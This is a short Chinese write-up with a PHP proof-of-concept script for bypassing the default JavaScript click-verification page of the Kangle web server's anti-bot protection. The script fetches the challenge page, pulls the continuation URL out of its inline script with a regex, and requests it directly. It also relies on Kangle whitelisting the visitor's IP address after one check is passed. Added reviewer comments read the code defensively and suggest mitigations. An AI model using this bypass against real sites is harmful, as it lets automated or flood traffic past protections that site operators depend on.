Kangle 默认的点击验证很简单，通过正则匹配即可完全 bypass。其次，Kangle 存在 IP 白名单：如果短时间内通过了一次验证，则无需 cookie 也可直接访问网站内容。也就是说，放行状态是按来源 IP 记录的，而不是绑定在 cookie 上。
贴上POC
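<?php
/*
 * Bypass BY: wafcloud
 * For technical research only; use for illegal purposes is strictly prohibited.
 * A regular expression is enough to handle Kangle's default JS click verification.
 *
 * Reviewer notes (defensive reading of what the script demonstrates):
 *  - The continuation URL is recovered from the `location.href = ...;` assignment
 *    in the challenge page with a regex, so the challenge is passed by a client
 *    that never executes JavaScript.
 *  - Each curl() call opens a fresh handle and only CURLOPT_COOKIEJAR is set
 *    (no CURLOPT_COOKIEFILE), so cookies are written to the jar but are not
 *    carried over between calls. That matches the write-up's statement that a
 *    recently verified IP is served without a cookie.
 *  - The User-Agent below is a fixed string, so requests from this exact script
 *    can be picked out of access logs by it.
 *  - Mitigation direction: bind the "verified" state to a per-client token
 *    rather than to the source IP alone, and do not hand the continuation URL
 *    to the client as plain inline script.
 */

// Cookie jar file. tempnam() creates it; it is removed at the end of the script.
$cookie_jar = tempnam('./tmp', 'cookie');

/**
 * Minimal cURL wrapper: sends one request and returns the response body.
 *
 * @param string       $cookieUrl   File cURL writes received cookies to (CURLOPT_COOKIEJAR).
 * @param string       $url         Request URL; an empty value returns '' without sending anything.
 * @param array        $addHeaders  Extra header lines appended to the defaults.
 * @param string       $requestType 'get', 'post', or another verb (sent upper-cased as a custom request).
 * @param array|string $requestData Body for non-GET requests: field array or raw string.
 * @param string       $postType    'json' sends the body JSON-encoded with a JSON Content-Type.
 * @param bool         $urlencode   Whether array fields are percent-encoded when the body is built.
 *
 * @return string Response body, or '' if the URL is empty or the transfer fails.
 */
function curl($cookieUrl, $url = '', $addHeaders = [], $requestType = 'get', $requestData = '', $postType = '', $urlencode = true)
{
    // Nothing to request.
    if (empty($url)) {
        return '';
    }

    $headers = [
        'User-Agent: Mozilla/7.0 (Windows; U; Windows NT 6.1; zh-CN; rv:2.9) Gecko/2018052906 Firefox/3.0',
    ];

    if (strtolower($postType) === 'json' && $requestType !== 'get') {
        $headers[] = 'Content-Type: application/json; charset=utf-8';
        $requestData = is_array($requestData) ? json_encode($requestData) : $requestData;
        $headers[] = 'Content-Length: ' . strlen($requestData);
    }

    if (!empty($addHeaders)) {
        $headers = array_merge($headers, $addHeaders);
    }

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieUrl);
    curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
    // Follow 302 redirects.
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

    // Keep certificate and host-name verification on: the response body is
    // parsed and part of it is appended to the next request URL, so it must
    // come from the intended server. (The original disabled both checks.)
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);

    // Select the HTTP method.
    if ($requestType === 'get') {
        curl_setopt($ch, CURLOPT_HEADER, false);
    } elseif ($requestType === 'post') {
        curl_setopt($ch, CURLOPT_POST, 1);
    } else {
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, strtoupper($requestType));
    }

    if ($requestType !== 'get') {
        if (is_array($requestData) && !empty($requestData)) {
            $pairs = [];
            foreach ($requestData as $key => $value) {
                // NOTE(review): keys and values are percent-encoded twice, as in
                // the original; presumably intentional for some endpoint, confirm.
                $pairs[] = $urlencode
                    ? rawurlencode(rawurlencode($key)) . '=' . rawurlencode(rawurlencode($value))
                    : $key . '=' . $value;
            }
            $requestData = implode('&', $pairs);
        }
        curl_setopt($ch, CURLOPT_POSTFIELDS, $requestData);
    }

    $result = curl_exec($ch);
    curl_close($ch);

    // curl_exec() returns false on failure; callers treat the result as a string.
    return $result === false ? '' : $result;
}

/**
 * Tells whether $html is the interstitial challenge page.
 *
 * Despite the name, true means the response IS the protection page, recognised
 * by its <title> ("安全防护系统", roughly "Security Protection System").
 *
 * @param string $html Response body to inspect.
 *
 * @return bool
 */
function isSafe($html)
{
    return preg_match('/<title>安全防护系统<\/title>/', $html) === 1;
}

/**
 * Fetches $url and, if the challenge page comes back, builds the continuation URL.
 *
 * The value assigned to location.href is captured, double quotes, '+' and all
 * whitespace are stripped from it, and the remainder is appended to $url.
 *
 * @param string $cookie_jar Cookie jar path passed through to curl().
 * @param string $url        Base URL of the site.
 *
 * @return string The continuation URL, or '' when no challenge page was
 *                returned or the assignment could not be found.
 */
function getSafeUrl($cookie_jar, $url)
{
    $data = curl($cookie_jar, $url);
    if (!isSafe($data)) {
        return '';
    }

    // The dot in "location.href" is unescaped and ".+" is greedy, exactly as in the original.
    preg_match('/location.href =(.+);/', $data, $matches);
    if (count($matches) !== 2) {
        return '';
    }

    $path = preg_replace('/"|\+/', '', $matches[1]);
    $path = preg_replace('/\s/', '', $path);

    return $url . $path;
}

echo curl($cookie_jar, getSafeUrl($cookie_jar, "https://www.123.com/"));

// The jar holds whatever cookies the server set; do not leave it on disk.
if (is_string($cookie_jar) && is_file($cookie_jar)) {
    unlink($cookie_jar);
}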